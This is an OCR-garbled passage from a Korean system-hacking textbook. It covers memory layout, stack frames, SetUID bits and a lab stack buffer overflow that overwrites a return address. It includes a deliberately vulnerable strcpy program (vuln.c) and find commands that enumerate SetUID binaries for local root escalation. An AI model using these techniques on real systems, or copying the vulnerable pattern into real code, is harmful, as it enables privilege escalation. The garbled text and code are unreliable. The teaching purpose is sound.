
// dumpcodeZ H|22| EX
dumpcode(buffer, 28);
printf(“[*] BEFORE : the return address is 0x% 08xWn¥n”, *pointer_to_ret);

// buffer overflow!!
strcpy(buffer, argv[1]);

// dumpcodeZ H|Z22| EX
dumpcode(buffer, 28);
printf(“[*] AFTER : the return address is 0x % 08x¥Wn#n”, *pointer_to_ret);

T g EfoldS & ASSItH, o A 37 o]¥2] ¢k& FYth.
Z}, o] A return addressE 0x123456782 HHE A A 2.,

o
ol
rlo
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$ /ex3 AAAAAAAAAAAAAAAAAAAAAAAA perl -e ‘print “Wx78WX56Wx34Wx12™
Oxbffffo14 00 00 00 00 00 00 0000 0000000000000000 ...............

Oxbffffo24 00 00 00 00 48 fb ff bf cb 09 03 40 LH..@

[*] BEFORE : the return address is 0x400309ch

Oxbffffo14 4141 41 41 4141 4141414141 41 41414141 AAAAAAAAAAAAAAAA
Oxbffffb24 4141 41 41414141 4178563412 AAAAAAAAXVA.
[*] AFTER : the return address is 0x12345678

Segmentation fault (core dumped)

$

Ayt Little Endianof|2t F-2J5tAH 2 EA41= 9loAS Ayt
1811 return address”7} 0x123456789] EHE
Segmentation fault of|2] WA 2|7} Yehd A

filo 02

o] %38 Segmetation falut= return address7} @7} &5 F4=Z

BFASLE T Sshe o2l WA gy,

AA| Segmentaion fault oA 2] = w| R e] 4 Fof] A
= v e] Aol AL, HETAEMNE /A7) /) o] FwokA] &2 o EEEHY

ozt o return addressE Oxdeadbeefdt= FAE H}Jﬂiﬂlﬂ-
HI2 AABL 16042 EUL 4 AL BAEE o854l W USHE He
Zolsl=d|Q, Oxdeadbeef?_’r 16242 JHE “Z=2 717]7 8 = /\‘QL]E]'.

o,
ofl
rlo
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§ /ex3 AAAAAAAAAAAAAAAAAAAAAAAA perl -e ‘print “WxefWxbeWxadwxde™
Oxbffffo14 00 00 00 00 00 00 0000 0000000000000000 ...............
Oxbffffo24 00 00 00 00 48 fb ff bf cb 09 03 40 LH..@

[*] BEFORE : the return address is 0x400309ch

Oxbffffo14 4141 41 41 4141 4141414141 41 41414141 AAAAAAAAAAAAAAAA
Oxbffffb24 4141 41 41 41 41 41 41 efbead de AAAAAAAA....
[*] AFTER : the return address is Oxdeadbeef

Segmentation fault (core dumped)

$
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2 $H02 vue PP I

3] o]t malloc() = <l
Iyt &4 WolMwh fragt 29 fau, a2 05 A3 Wiul Wi gof 4=stA
H}t

d

M i
He Ay Wt g, 54 Hee TR IHW7E Yok Al R
A Al = 7] 2ol ME2E HS agdos wed 4 U= 1
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o - FEge 17)7}
A LS Z T = —8HYYIN — — T w_)\}gfﬂ_ibt E.,j;__
B etoluale Selo] wjel e glo] PRHOR AFgels dolnale) gl
T E oS Do gror midl 22 9 Woll A printf() 2ol B2fe] k5 ALE-
H, A o] §45 713 9= /lib/libe.so.6 TFLo] o] GG AR = AAY

2 ek, wQl 229 Yol A printfQ 2to] B2 g 3t st
AHg5E okl & o, libe.so.6 WO printf() $H4= ©F Shugt o 28] of
HAA=EE Aol od, printfQE 7FA] 3 = libc.so.6 1Y ]
SAZ Wl S Y. 184 A3 libe.so.6 ¢t

= 450l o] golBE e JH $A]5HA Ut

— \aT1 =

gloF libe.so.6 tolriele] mkel vol mghel 94 =2o] FF use/bin/nm &
gele g ALgshe Byt
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$ /usr/bin/nm /lib/libc.so.6 | more

008f5630 T ctime_r
009c802c d current_rtmax
009c¢8028 d current_rtmin
009c9bf0 b curshell
008adb10 T cuserid
00941800 T daemon

ApAjeto 2 Aeolat el §4 5Evt pelE AR Ee] SixsH He iUt

\
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a0 o] A= o] ol 53 $EOR H7] gaf

2he Qrotol @ AUtk F4 ol FeIAE Fotok return addressE ©] O
v}

ot
4, 71 979 sets AA F4

BA

J14/ex1.c

$cd14
$ catex1.c
int main()
{
printf(“Ox% 08x¥n”, &main);
1

$ gcc -0 ex1 ex1.c
$ Jex1
0x080483c8

Foll AHskL e main ] F42E S HkEUH

o o] o] 7F e o] AlZF =491 0x00000000¢] o}
orTh AR U T AlA] 0x00000000074 SF 008040000 74 ] w1
=] 7] oF2 AdElE Hlo] oA HyTh
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2. 271314 glo]H o] =4

J14/ex2.c

$ catex2.c
inta=10;

int main()

{
staticint b = 20;

printf(“&a = 0x% 08xWn”, &a);
printf(“&b = 0x% 08x#n”, &b);
}

$ gcc -0 ex2 ex2.c
$ ./ex2

&a = 0x08049478
&b = 0x0804947c¢

71 A3} main §9] F491 0x080483c8 Xt} k7t o] 9= wre] oo 7|5} H
dlolESo] 9IAlah ATk AL S SHRIT 5
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3. W27 81 olE o] 4

J14/ex3.c
$ cat ex3.c

int a;

int main()
{
static int b;

printf(“&a = 0x% 08xWn”, &a);
printf(“&b = 0x% 08x#n”, &b);

}

$ gcc-o ex3 ex3.c

$ ./ex3

&a = 0x08049568

&b = 0x08049564

$
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J14/ex4.c

4. Q9 F4

$ cat exd.c
int main()

{
char *heap = (char *)malloc(100);

printf(‘heap = 0x%08xWn”, heap);
}

$ gcc-o exd ex4 .c

$ Jexd

heap = 0x08049588
$

< malloc() & Fofl &4 W] gd= T2 9 dolH gyt

HXJE* ¢ G2 2719k Hole F9, Z1eal vz27|skd Hol" J 9ol
ololA F3te AAISHA H
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J14/ex5.c

$ cat ex5.c

/*

compile

$ gcc -o addr_of_printf addr_of printf.c -lc -IdI
*/

#include <dlfcn.h>

int main()

{
long addr;
void *handle;

handle = dlopen(“/lib/libc.s0.6”, RTLD_LAZY);
addr = (long)dIsym(handle, “printf”);
printf(“printf() is at Ox%xWn”, addr);

}

$ gcc -0 ex5 ex5.c -Ic -ldl
$ ./ex5

printf() is at 0x4006604c
$

o2 2ol B e okpo] A YU gfo|H ] o] A= 919 dA| A"
dlopen()Z} dlsym() ?+=5 o]-&sto] 2l & 4= Jl5H

12 -lcE AL libe.soS HA B2 24 libdl.sool @8] H&®a] F43k
21U &, -1cE WiH libdl.so7} libc.soE th H A v a]of] 27
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J14/ex6.c
$ cat ex6.c
int main()
{
int a;
int b;

printf(“&a = 0x% 08xWn”, &a);
printf(“&b = 0x% 08x#n”, &b);
}

$ gcc -0 ex6 ex6.c
$ ./ex6

&a = Oxbffffb44
&b = Oxbffffb40

$
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7. 7449 F4
J14/ex7 .c
$ catex7.c

int main()

{
int *addr = (int *)0xc0000000;

printf(“%x#n”, *addr);
}

$ gcc-o ex7 ex7.c
$ Jex7
Segmentation fault (core dumped)

$
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TrekF Ad 9 4F dlolHE9] 4 AHE B Aohd o33 o] System.map
g F5) 7H F1d = Jd5Yth

$ cat /boot/System.map | more
c0100000 A _text
c0100000 T _stext
c0100000 T stext
c0100000 t startup_32
c01000a4 t checkCPUtype
c0100138 tis486
c0100147 tis386
c01001ae t L6

c01001b0 t ready
c01001b1 t check x87
c01001da t setup_idt
c01001f7 t rp_sidt
c0100204 T stack_start

olF A A A4 Y9 7 G, 2L FAH G <ol AAIStAL A=
sl sigshe AA WR2e F4 ges dHEdSs Y

27|54 HIEJIEE SHEH " T HEHe
&maln ha P i &printf a AHdEH
008048308 QeA00BADAC  OwEFFFFEA4 DC 0000000 ~ CeFFFFFFFE
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®
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15 AEBH(stack) 9 R2 ¢ 244

®

B gt A BYTA 5 A A8 FEE AA

ol A2 7HY UFol Eol2 A=t 7PE WA YA = 7] o Zef LIFO(Last—
In, First—-Out), 98T 2E “TAAEY X"t gt} k& o] FILO(First—In,
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E— ,_=_=_-.J ———l
Top = 5 - -
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ot A g8 7F F7hEH 28 o] TOPS] YA EobAal, ¥t = H|ol e 7} A7 =
H TOP] #12]= thA] Wob Yt TOPO| == L8 of tloJe 7} 27t AL A A
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EthE Yoyt
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HA LHE p-lht%w
; |17 LEHO|| A= s 2T

SEC—‘th'ﬂ 7

oA 28jof A EE HEAS g AN, 2d

of s ZHAI5] A H RS T

b ghof AAE A HeE2 25 Ao AgH U,
oh2 3 2ol main 94 ¢rofl AAE Y] 7He] o Ha4ES FAIH
int main()
{
inta=1;
intb=2;
intc=3;
intd=4;

o[ H 4 toll AdH AqHLES T AAH Ao BHA A= 2o PUSH

pus\\‘- pus\\‘- ?“s“" pus\\‘-

YA A S S
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HA LHELS-2h1A TR
17 2B M= 3 AT E7|I

o|f1<ll dumpcode() &5 o]-&sto] AA| 9] A|gufFo] A8 AHH HAA B
= o§l el HASH T

LI

dumpcode() T4 A HA AR W] FAE, 81 F A =z £
2718 ARSE R, bt 2ol v o] A S F P e T4 d ¥e F
Aoy Mig2] F 37190 16 A= A5 HAS U

J17/ex1.c
#include “dumpcode.h”

int main()

{
inta=1;
intb=2;
intc=3;
intd =4,

dumpcode((unsigned char *)&d, 16);

(H) 23t]

$cd17
$ Jex1
Oxbffffb38 04 00 00 00 03 00 00 00 02 00 00 00 01 00 00 00

$

Slef) Holi= Buprk AA] 20| ARje] 7V 77k B
9l At © 2 oldlis}7] SIahAl The Tt o) Aol whelw Zolq B Hutt,
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HiA ilhil’s_——‘i,l-vl% ]
: |17 ABHO| MR = s AT ET|

$ Jex1
Oxbffffb38 [04 00 00 00] [03 00 00 00] [02 00 00 00] [01 00 00 00]

$

Slef 4] [19ho2 24 ) o] ghSo] wh @4 Qrell Qg d, c, b, a o] 2] U] A
o 2o} WMA-SU T} ol 4 Ha W] MG 2| W42 a(==1)7} WL Fo4
ol b Eom], 7P el AT d==4e TH Be Fao] S1X5HE AL
stols} 2~ 9l 1T},

=2 T x»g

@2 4utoEol7] o], 228 doje o] 7] 27191 4ufo] ESt B
§F 1u}o] £¢] char Hlo]E] @]t 2uFo] =1 short Hle]ElFe]
o oBA Aol B2

>.
I
X
re,
et
o
—lo
l >
Jlufcs

9ol 4uto] Eof 4] HEg upo|Eur2 o] Hlo|E7} ¢Jolg FrEYT 3, 14}
char Ho1E1 9 390 £33 3utol7 2202 220126l shore oIl 3
817] 919) Tt o] 71 W45 Afole] xehe char HloEd W4 4

J17/ex2.c
#include <dumpcode.h)>

int main()

{
inta=1,
intb=2;
charx=7;
intc=3;
intd=4;

dumpcode(&d, 20);



HiA 1lﬁﬁs_——ihd~~m
17 ABH0| A= 2fE AT _‘i'7||

(A=) A3t]

$ /ex2

Oxbffffb34 [04 00 00 00] [03 00 00 00] [eb 83 04 07] [02 0000 00] ...ocvove......
Oxbffffo44 [01 00 00 00]

$

O]9 a, b} ¢, d 4= AFo]o] char x ¥4-2] gto] sk 070] 27 iUt 1
2H] 07 8 9O eb 83 Odatt 919 9] 3uo] E7} ol gl RS 2 4 gytt.

o] §19]9] 3uto]Eof oot 52 7]EC] AR EE w2 gro] A= Holsle
T 02X, o5 dummy &2 éﬁElﬂ groletar -5yt 12|11 of 2] charx 4
o ShFsh= 07 2 14l E @9l 2nk 2 Zo]7] wjZo] dummy= &2 3Ho|E
7F oJd Q1 2= S 85| ghsyTh

2] little endian A1 0 2 2 A= E]'E ZF=(of. 04 00 00 00)¥H= =] eb 84 04
07 gte] Hio|E =A17F BHAA] ¢k ©]-f+= Byte Ordering Hgho] 2H}o]|E o]/4F9] ¢
o] E] R of| At o] Fo 2] 7] W T

=, T 1H}O]E char d]o]H @ Q1 0x07-2 o] <oA1 & vHE thAiko] ¢l7] wf&of Byte
Ordering®] dojuhA] g5t

S 0 2 short glo|E o] AL 22 HAEE EASY T
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: |17 ABHO| MR = s AT ET|

J17/ex3.c

#include <dumpcode.h)>

int main()

{
inta=1,
intb=2;
shortx =7;
intc=23;
intd=4;

dumpcode(&d, 20);

ELEER

$ /ex3

Oxbffffb34 [04 00 00 00] [03 00 00 00] [eb 83 07 00] [02 00 00 O0] ................
Oxbffffb44 [01 00 00 00] :

$

= )

npxk7h2] 2 BZ5E 2uto] ERFE 2] dummy(eb 83)7F 2 A2 &9ld &= 2l
1331 short®-> 2HIO| E o]/fo] 7| wj#o] Byte Ordering®] ¥oju =417t
SFYrth

ek,
7}

()]
AN

Q13 1k

>
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0
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17. AEHO“ ;(-|2+5|L 7H= AI-]I E7|I

2. g€ o= A9t AH
ojiel 9 £ATE A B8 BEE TES Fobe BAST
J17/ex4 .c
#include <dumpcode.h)>
func()
{
inta=>5;
intb =6;
dumpcode (&b, 32);
}
int main()
{
inta=1;
intb=2;
intc=3;
intd=4
/1AM e+ 52
func();
}
oA Shte] ol A 24l bR AFY S Fo] vupE W, AFA] ol A

A B 42 Zolrtr] $st

=LA77 28] A E A Y.
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HA LHEL -2 1A TR
17 ABH0| M= 2 4TE|

oA func) @47t T2HL o] wma] AFe] A e AL func() 2] b 7]
o] g gma] Kokt

$ Jexd

Oxbffffb28 [06 00 00 00] [05 00 00 00] [48 fb ff bf] [2f860408] ........ H./..

Oxbffffb38 [04 00 00 00] [03 00 00 00] [02 00 00 00] [01 00000Q] ..............

$
Qo Hol= 2f 86 04 08(== 0x0804862f) FA7} HtE AElo] A H 2§ o= A
Ayt

a1 el o] B A Q2o o]Alst ZEQl 48 fb ff bf7} Hol:d], o] o] Mo H7t
AZ=E SFP(Saved Frame Pointer)2H= 2k Ut} of2l& o] Zro] B2 ZQ5hA] ¢
ooz g old A oketargt Agsta dolrHls Yok

olFAISNA L] 2| o= ATt A HE BegS AAR gels) Hoksyth



# seii-siniio | RN
i< o @

J
|>
i
=2
X
o
mn
rr
o\J

3. §4-0) ARe} 2
np2|eto 2 § 2= ehof QIA 2T 9] AY B5S AnEASYT
J17/ex5.c
#include <dumpcode.h)>

func(int arg1, int arg2)
{

inta=>5;

intb =6;

dumpcode(&b, 40);

}

int main()

{
inta=1;
intb=2;
intc=3;
intd=4;
/1AM et 5=
func(10, 20);

}

ol AY Fol AR EAT A5 2 ol=el 2ot A Aol B4 AAEo]
¥ Zeho] 43U,
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# seii-siniio | RN
17 2et0f Aasle 25 Ao

oo dumpcode() 2 Q1S Sl =dld], A=) PUSHH 2ol & 107o|B2 g
3715 4002 EHHY

(A=) At]

$ Jex5

Oxbffffb20 [06 00 00 00] [05 00 00 00] [48 fb ff bf] [33860408] ........ H.3..
Oxbffffb30 [0a 00 00 00] [14 00 00 00] [04 00 00 00] [03 00 00 00]
Oxbffffb40 [02 00 00 00] [01 00 00 00]

$

floll Hol= 0a 00 00 00°] argl(== 10)o]™, 14 00 00 00°] arg2(== 20)°ll siFe

A}

oldA A o] AT EAG A-0] A mHS A

o
_EL

Hoksyh

oA7| A = HR et Al HA ofjA|of| 4] A2 RET, SFP, a, b, argl, arg2+= 25 func()
o|gh= shte] ol sigshe dHete T5de HAT 4 AsUHh 1A ol
= FolA st OFer AT 4 qlet, ol F "2 ¢ (stack frame)”o]2Hal

Fuict.

%

=, funcOol2te &=eoll AR A4, A, 2l of =22, SFP7F o4 4 A

Shipe] "8 majel el A
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func(&4=2] AEH maj|Q(stack frame)
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17 2B M= 3 AT -‘i'7||

J17/ex6.c
void func3(void)

{
}

void func2(void)
{

func3();
}

void func1()
{

func2();
}

void main()
{

func1();
}

et e FEo A9 e §& A= main( - funcl( - func2() —> func30
Ayt 183 g7 —'—E{E]‘_ &A= "H 2 func3() - func2() - funcl() —
main()°o] HYt}.

WA S e Bl g Bhe A
| 59 A7t AHg, 193 oA
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3 QHERPE Nt AR lH o R TSR R, wof ojd AR|Art 2
goldERRH S &S ol 11 2715 A= A 25k = 3¢ S RE B &

HER$ Ferdo] WA 4 gyt

fllo
ok

293 W oM ERSE Qo7 AR n2Ie] 552 WAAA 97
SSAU AR ARE AH] 74 4 gt



s N
19.2|2E HIY QUZ229 22 WY g.ﬂgﬁq f

ohe, Al WAl 22 of el (Local Attack) T tigh A Uik,
2 RE olelg o) Qojul BT A9l wet e AHroon) BIY 4= UL,
e BT A AFSA AT S G

ol el mE ojgle] thigo] © AulA7} o | AFOE AFH T Yt utet A
gyt
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oA U5 (25 A o] EAg ek,
1 ol “ay }ﬂm Hagrela A dojopat shz 4R o] WaH oz £

A4 ol vtz ARMAREAE A1 O] A =g W7 ’5}% Y.
/etc/passwd®} /etc/shadowet Zro] sjAQEet HAH F

Tro] Hgg o= A Soflsy. shAT dHAREAE il
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"yt 8|3 =2 g3 0] Agjo] FrFe o7t Huye|at Ashe vidsiA "y

.
olo} Z-& w7 Zo] B SetUID birghs A0 2 T@AL o] it

SetUID bireh gt 2 A1) wolo] el 44" % shtdu. o] &4o] Rojgl

el A w5 A Mo g Ase /1A HE AU

FoFe1E olel@ £4UAEL

o

theat 2ol 3 B2 Fefshi s Bo] -1 &4
X
=




HA LHEL -2 1A TR
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$ Is -al /usr/bin/passwd
-r-s--x--x 1 root root 12244 Feb 8 2000 /usr/bin/passwd

$
AolA 7 250 WEZF w9 445 vEhiH, ¢17] dtE Uetdle r £4, 2
7] Agte Yetdle w 4, A3 A& YEhl= x 54 2] s2te &40 | HiA|

2Ap2 et 9isd, o] s £40] Hh SerUID bicrh Fol® mel e ojulgh e,
o] A% s S40] HolHl BE AW WASL I welo] 242 BeHSI9] A roon)
oz AEsH guh

o] 4 SetUID tiAYZL S8 dA Aoz Huda|zt e A7 =E P72
orAol 2 EA|7E E A= g5t uFstH o] ebo] SetUID bit7F A H U E2
A E5 T 5 e Asol it Alere] 27] Wiyt oA Ee gFA o= 54_'
WA Eeks dettd A, AL Antst §F2 71A= 59 s D 4t |l

et

SHA T Tk SetUID bit7} AA W mtdof vjn QW Z 29 =o] ok o] ZA)sthH
W17t &3] EEV‘W?} Ho @ HER2 FFH2 ol& o}‘ﬁ ‘Lz o] A 5
B2 913" & 7] dEdYth 224 TeF SetUID bitZb AR H mhdol Hn @
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ol 22 utelo] SetUID bitE Hojdle A&S E5) SetUIDS 5} o35
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olofl A Bl LFAAL] AgAF W A|2H=lof| tisf 2ot & ZQIH, ofu] o]
sl & & AATrE el she ZFLoflA elelFAl7] viE Yt

gl A oFo] E ALRAELS AT 1.9
2141 of Agte] whet A uff o2 A8 ol B glo]y
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7] 24 2 vE At el dgke gelskd, Jusr/bin/idehe BES 23St H

$id <= A2| Zpelel M eHE =kl
uid=500(student) gid=500(student) groups=500(student)
$

$ id root {- root A2 2}o| HFHS S0l

uid=0(root) gid=0(root) groups=0(root), 1(bin),2(daemon),3(sys),4(adm),6(dis
k),10(wheel)

$
2520 AFERFES] HSH AR = Jetc/passwd B Jetc/group THA ol 7] =H YT},
T1EA o] id B2 AAR 9 F d o] AEE dojobA] HojF= AT gyt
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uid=500(student) : AF2Ate| N5t S HGHS LIEFHLCE
0| Here 22t HENZ =l uvid(user id) T2 AFRAHYH 1 2|2
HAIE £ Q&LICE

gid=500(student) : R4 H&t 2/0| 11§ H5H0|2t= A= 2AsH=d|,
O|AHE 02 AtEAtSE stLtel 1822 FOA 2ot At g uf
AL EILICH Ol= CHeol AFBAIS0)H SYst 2 At QoA SAH(S )
L8FHL|Ct 0| gid(group id) ZEL aiE ALRZIC| 12 2|0|5tH,
A A HEH 2 E gidL OAEHo = HA|E LT
J2|3 OHE AFER}E0| 0] 50| ALKE 4 JELICE

groups=500(student) : O| A2 A AL} &&E AFSS LHEFLICH
Ap7| Appl2 gy AH4lol 15| HHE AL,
20 wat 24l 0[2|9f CHE 0f2] A§=0 8= &5E + UB LI

219] id Of|A| S root AFEAHE 03] AE0 AL JUSS &+ USLICH
202 A2 20| cfst A= /etc/group THUO| 7| 2E|0f 1o,
O| HA| 2|122| R (root) Hete 20 HASE 4~ QI&L|CEH

919t 2o AHA AT HHEL Aol T So] A v A A2 B o A
25yt

AEUle] Thels elA] AAlgke] 14
sho] mhelo] ol Aske] HgkE|7) ¢
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=2 7R A ==, weF ARgARe] A
H w2 o] FLo] FA|(Forbidden)HY

the o] Tl oA Ak,

$cd 21

$ Is -al test

-rwxrwxr-x 1 student student 11742 Aug 9 2011 test
$
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47 Is PRl -1 4L EolA| H, stelo] AT JRE THF AT o} &

=gyt

7H FSo BAIE AEQ “—rwxrwxr—x” SEZ}HER 0t o] M-S YERH, o]
< Yl F2o 8 A UE o s U T

1. - T ClER|e] PR LE, ClAERIY FP 0] £20| d23 BAIPLICH

2. rwx : O] It AR}, = MAUQ| £0I0f Cish HstS LIEHHLICE

2= M BR HE9| studentt OfZ| & LICE. (student studentOi|A] 21Z)

2t2t0| JRAE2 MEAQl H2 HsHS LEIWED, r2 87| He we 27| st 1
2|1 xe= HEHSHS 90| LCt

=, student2t= |4 HEHE 7H2| 10 e AHERf= O] IHAS QA LE, 7Lt Aalish
£ QU o|0[ LT,

3. rwx : O] ItAo| AR JFO0f Cish HetS LIEFHLICH OEHE U Ha ZHEC!
student@} OfZ|EL|C}. (student studentdi|A 2LEZ)

=, studentet= OSHO| AL5E 25 AREAS0|A siE A ek (rwx)0ll 4-&0] &L(Ct,

4. r-x:0|A2 O] MU ARARL A7 AFES H|2let LHE 2E AHEASO]| Chet et
= LIEtgLC.
CHE AFBAHS0| O] IS HALH(r) H™ATt=(x) A2 7HSSHAITE, w(7]) Hete

=2 ¢+ AsUoh

ol Bl L] E o2 AR H| e e Y HdSS Az AHEAF .

$ Is -al /var/spool/mail/student
-rw-rw---- 1 student mail 376 Aug 9 2011 /var/spool/mail/student
$

=) student 54 : ¢17]
=) mail 25 £2&49 #
=) 11 o] A& ¢ ol H Aol gl




HiA 11&(‘1;_—-%7:
|21 SetUID ﬁéH 2]

$ Is -al /etc/passwd
-rw-r--r-- 1 root root 704 Jul 22 2010 /etc/passwd
$

=) root 34 : Q7] #7] 7}
=) root :L—-—Oﬂ 225 9AE ;97| FHs
=> 1 9] AAEAE 7T A1

$ Is -al /usr/bin/passwd
-r-s--x--x 1 root root 12244 Feb 8 2000 /usr/bin/passwd
$

=) oot 47 1 917], A% A5

* o71q A 7Hs= YEll= 227 x tﬂ‘] sl Zof FEYr.
o] o] I SetUID bit7} AAE o] 98- Yehfd, o] mpel-e Addst= AHeA}
E2 dAH o= o] o] AFAF AT root ARHE A & oJu|dYr.
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./21/setuid_test.c

int main()

{
system(“/usr/bin/id”); // id @E AHS EdH S 2}Llo| HetsS £t

}
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21.SetUID & & @

2. A% F AL gt (3, setuid §lo] A

$ gcc -o setuid_test setuid_test.c
$ ./setuid_test
uid=500(student) gid=500(student) groups=500(student)

$
olx ¥ d PP AP system() ol SIsf /usr/bin/id F o] HFE o™
2% A student @to] FE Ae AT 4 UsUH

3. o]l A7} u]g] gtEo] E2 /home/student/21/setuid_test2 Tt o] AT &2l
it

$ Is -al setuid_test2
-rwsr-xr-x 1 root root 11738 Aug 9 2011 setuid_test2
$

5t 2ho] 8.2 o] Hholof SetUID bitzh 5] azu}% A QUL

=) root F4 1§71, 271, A¥ 7}astH, o] npAd-S A ol= AFSEAFES FAH L
2 root HeHS A E
=) root Z1F 2&H 54 : ¢17], A9 7t

=> 1 9] AFAFE 97, A THs

4. 91 AL Y BTk (F, setuid’t A A AY)

$ /setuid_test2
uid=500(student) gid=500(student) euid=0(root) groups=500(student)
$
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71 A7} euid=0(root) 2= M 28 HgH AW I} 2715
SetUID bitE &l A A=z of2 S 44 2 7

= o)A gunt,

uide= real idE 2|0|5t04, SetUID bitE Sdli M22 Hets 27| 2| i
LIEF4LICE

euid= effective idZ 2|0|5t0, SetUID bit2 Sal M2 LA = HEHS LIEFHL|CT

[*]

149 Qe o] Askat Az Asto] Zi7F EABHE o], Aol ek gejo] A
32 Joto} & W a o] A47]7] BB (o]o] daiH® AshEc] A EEE 5}

A5YTh)

olekzrol Az @A H id7} root7h H YTk AL ALgAe] Ajto] AXH O & root7}
s)gicks Ty

ol 791 9] 2427} rooto]o], o] roote] AFOR SetUID £4J0] AgE|o] 917]
2yt

$id
uid=500(student) gid=500(student) groups=500(student)
$

A SetUID bit2 A1 AT A5

Flo
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ol
me
£
)
)
rlﬂ
Jo
ol
o
i

2 o]H 9 dofA &4 A3t root7t H1 18 P I E student?l o]-G=
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21.SetUID & &

Hid o] ZHe f Eglof 50190 setgid_test TFA-2 155 Aol SetUID bit7} 4
A=) FUTLE oA EH 15 A SetUID Z4d 0] Folw 7399l SetUID7} oFd,
SetGID(set group id)2al F-E5 Yt

$ Is -al setgid_test
-rwxr-sr-x 1 root root 11737 Aug 9 2011 setgid_test
$

5. setgid_testE AP FUT. (setgid7t A9 w2 A3

$ /setgid_test
uid=500(student) gid=500(student) egid=0(root) groups=500(student)
$

o] 1= ATto] AAAH O Z root7} H QL o 4 sy

O o
gk g 219} 118 AFH BT} root7} HE W 5 o] SetUIDE} SetGIDE £A4S 25
Fojohd Huyrh




HuA L lz_»—u-ﬂ)\\m
€? ; |22 SetUID, SetGID bitE Ad&st= &

tof SetUID &2 SetGID bitE A5t ™A /usr/bin/chmod
t}. chmod® change mode®] 2FAF] Ut}

1. USER®] SetUID bit 2o]5}7]

$ chmod u+s test

$ Is -al test

-rwsrwxr-x 1 student student 11742 Aug 9 21:19 test
$

2. USER] B-oJ5 SetUID bit A A58}

$ chmod u-s test

$ Is -al test

-rwxrwxr-x 1 student student 11742 Aug 9 21:19 test
$

3. GROUP9] SetGID bit F-&5}7]

$ chmod g+s test

$ Is -al test

-rwxrwsr-x 1 student student 11742 Aug 9 21:19 test
$
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WA LHELS-SEa1h T
22 SetUID, SetGID bitS A &st u+m|‘

4, GROUP®|| 95 SetGID bit Al A5}

$ chmod g-s test

$ Is -al test

-rwxrwxr-x 1 student student 11742 Aug 9 21:19 test
$

5. SetUID$} SetGID bitS B5 Hojs}s)

$ chmod ug+s test

$ Is -al test

-rwsrwsr-x 1 student student 11742 Aug 9 21:19 test
$

ok
rlo

I

$ chmod +s test

$ Is -al test

-rwsrwsr-x 1 student student 11742 Aug 9 21:19 test
$

6. SetUID} SetGID bitZ 25 A 5}7|

$ chmod ug-s test

$ Is -al test

-rwxrwxr-x 1 student student 11742 Aug 9 21:19 test
$

et
rlo
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HA ilhi’s_/—‘i}'ll%wd
@Izz SetUID, SetGID bitS M5t Y

$ chmod -s test

$ Is -al test

-rwxrwxr-x 1 student student 11742 Aug 9 21:19 test
$

U Aol A SetUID bit7} Hoj gl mfelE 2o}y 7]

$ find / -perm -u+s 2> /dev/null

/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/at
/usr/bin/inndstart
/usr/bin/rnews
/usr/bin/startinnfeed
/usr/bin/suidperl
/usr/bin/sperl5.00503
/usr/bin/lpq
/usr/bin/lpr
/usr/bin/lprm
/usr/bin/nwsfind
/usr/bin/passwd
/usr/bin/procmail
/usr/bin/rcp
/usr/bin/rlogin
/usr/bin/rsh
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/newgrp
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22 SetUID, SetGID bit2 A5}

W Aol A SetGID bit7} Fof g mtd5 Zropi 7]

$ find / -perm -g+s 2> /dev/null

/usr/lib/emacs/20.5/i386-redhat-linux-gnu/movemail

/usr/bin/wall
/usr/bin/inews
/usr/bin/lpg
/usr/bin/lpr
Jusr/bin/lprm
/usr/bin/man
/usr/bin/minicom
/usr/bin/lockfile
/usr/bin/procmail
/usr/bin/slocate
/usr/bin/write
/usr/bin/cu
/usr/bin/uuname

Y Ao A SetUIDS} SetGID bit7t B5

$ find / -perm -ug+s 2> /dev/null
/usr/bin/lpq
/usr/bin/lpr
/usr/bin/lprm
/usr/bin/procmail
/usr/bin/cu
/usr/bin/uuname
/usr/shin/sendmail
/usr/sbin/uucico
/usr/sbin/uuxagt
/sbin/dump
/sbin/restore

$

o

H

o o]

L I:II-I:H
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[find 8% 2459 ojn]]

/o ord A Al g g4 dE R e AU
—perm : B0l FAIHE HE 7|EL

—u+s : user®]| SetUID7} Fol¥ HgHS ojn|ghct,
—g+s : group®] SetGID7} F-of & gt oJm|g}

* ARt ol —E Eol9 siFEtte Zotetes Be wdES Ay

SetUID 246l 25l 4140 2 st root Aol B 4= Qlrk W& Bl A=
Ytk Zejuh B4 Abe] Aty Lz o] FRHW Heje] B3 A gl Ao
2 ¥)EoRhehs AL gyt

=

2 ‘24 o=l (Local Attack)” Ayt

SHAIRE QA O Z AL root BAES A% FAT 4 9 o] 5Tk 1 gie]

BEA) 27 o9 WS SetUID S40] ol TS Foll 4 FIoFa-S Hohf
AUrt. =, find B9.0.2 Fohdl B2 SeUID7t A9 TS F @ shijoleks Hlor
Aol ZAREA St roor AT A&H0 2 §AF 57k A&k,

dE &0, olH mtdof Hm eHERS FoFHo] Jtd “gE oEg A HEE F
off Al 555 WA 47 gl11, o]F A H3te A8 555 o]-8ote] root HEHE
T o] 2 M ASEAL} root ?ﬂ"}/] shell.& A1) & 4= QlttE= Edyt

A5 AH Q1 Redhat 6.290 4= B2 SetUID mtd Eo] At sHAT o] &5 i
S = 517]<ll o} £ 31—4 %‘1.01 HEEUoh 1%7] g2 4= 34 tidS d9=
A7t o] S FE 5= Aol HxYYH



HA ihl’sf ‘Lhc%w
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ot “root’E &l5ot

Erjo] §7 &
oA7171) @ At Sastagy

A|7HA wE L MER2-0] 7, ¥,
SetUID bit®]

o] sEat By wme g, A8, 19T
olalE Eof MM oHZa e T Was /LA A4d AAse
Aatgauch
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HTA 5,mﬁlz_/—ih
|23 £ Z ez Hst “root”E €l 55t

oA EXjo] o] Zate] LEZ o)A HEY FA0| 245 TA
Uet.

/vuln.c
int main(int argc, char *argv([])
{
char buffer[80];
// 22l 912} SHol
if(argc < 2)
{
printf(“argument errorn”);
exit(-1);
}
[/ Z20=H0| 2 B QIZE XY #H= buffer2 SAt
strcpy(buffer, argv[1]);
/] SAtE UYE =4
printf(“your input is %s¥n”, buffer);
}
o4 §] FEE Furd T,
FoFol gl mzaolet oujo] A kAL “vuln”oletw A&t
o]+= vulnerability (F12g) o] 2FAFiy o}
$ gcc-o vuln vuln.c
$ ./vuln ABCD
your input is ABCD
$
RS B F et AT, 9] 0] v QHERS Fopdo] EAFS &
o]l O A

o]
9104 AUtk 1202 o] 70| HePE-S ol &ste] elel ol e~
1, A% A9 588 uHE 5 Ay

5o

=z o

—ME= =
EE—] 222N
= = T
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23.5% : 2 mae st oot S a5t |
o}

